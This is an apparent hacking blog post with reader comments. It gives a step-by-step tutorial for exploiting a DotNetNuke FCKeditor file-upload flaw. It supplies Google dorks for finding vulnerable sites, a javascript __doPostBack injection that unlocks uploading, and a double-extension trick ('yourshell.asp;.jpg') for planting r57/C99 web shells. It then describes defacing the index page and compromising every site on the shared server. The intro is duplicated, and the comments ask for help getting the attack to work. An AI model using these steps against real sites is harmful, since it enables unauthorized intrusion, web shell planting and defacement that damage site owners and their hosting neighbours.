Hello everyone!!
I am going to tell about Dot net nuke exploit.I know some of you know about it but it is very good exploit to hack dot net sites.it is fucking exploit.you can even hack all sites hosted on same server.You can upload any file using it.
Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.
What is DNN ?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
I am going to tell about Dot net nuke exploit.I know some of you know about it but it is very good exploit to hack dot net sites.it is fucking exploit.you can even hack all sites hosted on same server.You can upload any file using it.
Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.
What is DNN ?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
Here is step by step tutorial:
Upload random file
Code:
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png,
*.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg,
*.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vobstep 1:use this dork to find vulnerable site
Code:
inurl:home/tabid/36/language/en-US/Default.aspx
Code:
inurl:fcklinkgallery.aspx
inurl:/portals/0
Spoiler (Click to Hide)
![[Image: temp1nd.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_viH-jKxXwwPZuV2WQGf6bUCVYKOvVR_ybbo7fKD-EMxzP7QJsuZIID64jGT2aXFLos7LnteV3mxCM7wXyHdfJg35Ylki8TD2L1liPlGmbRGEEpDQunwg=s0-d)
step 2:now open any site like
Code:
http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspxso your url will become
Code:
http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxand if you are lucky you will get this
Spoiler (Click to Hide)
![[Image: temp2x.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uUjGfhK59P-77nEmcrXypfhUKb_k6dQG6AqNWdNjNzpyy3LYBg3N2TmU6HaajdI-kze3Ns4i-kuBq-QHUr529ofQEP8Bp-ZnIhnwv5d3U0W6ejxJq1=s0-d)
step 3:Select 3rd option[file]
Spoiler (Click to Hide)
![[Image: temp3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tBjSCCEj6clPauWsR-67XVnE_Dg99iaVKTx1oJW2f9zgJzg0CH0Pd0vSjFSmKWOUuGNiJLPnVmSez-EZpj-aRQpGnHUMxT_h4xF-R1Gg1z14UdCLg=s0-d)
step 4: inject the following java code in browser address bar
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
Spoiler (Click to Hide)
![[Image: temp4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v_-dz48x4EotXfOCFQLseBW8qXWeiJUBHStEH_UbGCFSYGy5NvQkeBiZzxAVJdlO0NQBHWDCpAB_2rFz9M4yYHHvQIlVmJ1gnCVoKiED9yH3ztnfE=s0-d)
step 4:Now just upload your file for example mine is z.txt.when it is uploaded we can see it in root dir.
Spoiler (Click to Hide)
![[Image: temp5.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vvV0nUlJOwC4dr1MqIb1MlGwtrwJXV-4pd-8E0JJSdCR3tmKD-PZgCD9mXK1uhB76eXs3LopO05j3wrN-TAb2iwMqGNsOzdZUSelyTbl38w9ssO0A=s0-d)
step 5:Navigate to
Code:
http://www.vulsite.com/portals/0/z.txt
Spoiler (Click to Hide)
![[Image: temp6h.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_suMuTOg_hlc9JGhR0-c82MUDeKgIXiB8y2yZE7ZSmEs2gfG2QyjRS6LpEj_kWIWoUkrbqcrOy3IyYj6Neg_a5Q7tIC8U0RGa9dcSl-wCBy05K9OQvJ=s0-d)
You can see our file successfully uploaded.
method to upload shell:
Things you need:
An ASP shell
r57 or C99 Shell or anyother shell
step 4:rename your asp shell to
Code:
yourshell.asp;.jpgstep 5:Navigate it through
Code:
http://www.vulsite.com/portals/0/yourshell.asp;.jpg
Spoiler (Click to Hide)
![[Image: temp7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_thrVW9Gx8sMqul5LhI2ERoa9PzqhvamysW2725x_uIvqzDvBUX8RnOOtLf-rPgUpxCB04BWn0sydSkh1RMiYdPs_tHeiHbXQmxKrDT-GRlUni3Qg=s0-d)
step 6:Now upload your php shell using upload file option marked in above image.
step 7:Navigate it through
Code:
http://www.vulsite.com/portals/0/yourphpshell.php
Deface
step 8:Now replace your index.html with original index.html.Thats it.
all sites in server
Well you can hack all sites hosted on same server.
Spoiler (Click to Hide)
![[Image: temp8.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_szeQXeSCBk78OiI-IFplJTJfmanNPClhS9qmHMKOYlg0I48aYKvGZYPPYFlBtND78TD2PMEq4gjPjsOlOtxRQ-QgPAOhWbpXTAk0FPNa8UeuzRgoc=s0-d)
You Do Not Have Sufficient Permission To Write To Folder . Please Contact Your Hosting Provider To Ensure The Appropriate Security Settings Have Been Enabled On The Server.
ReplyDeleteError when uploading File
ReplyDeleteWhich browser are you using .??
ReplyDeleteUse Opera
Deletejavascript:__doPostBack
ReplyDelete('ctlURL$cmdUpload','') This keeps redirecting me to google search page. Showing me tutorial instead of the Linked Gallery upload as explaine and shown in the image example. Please help out
use opera
ReplyDeleteman nothing happen when i paste the code
ReplyDeleteafter uploading my shell,i see nothing on "./Portals/0/shell.asp;.jpg" page,i mean i see no shell getting executed,just a blank page i see in front of me ,tell me what to do ?
ReplyDeleteGood blogging.
ReplyDeleteDotnetnuke Hosting
Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.
ReplyDeleteDotNet Nuke training in Electronic City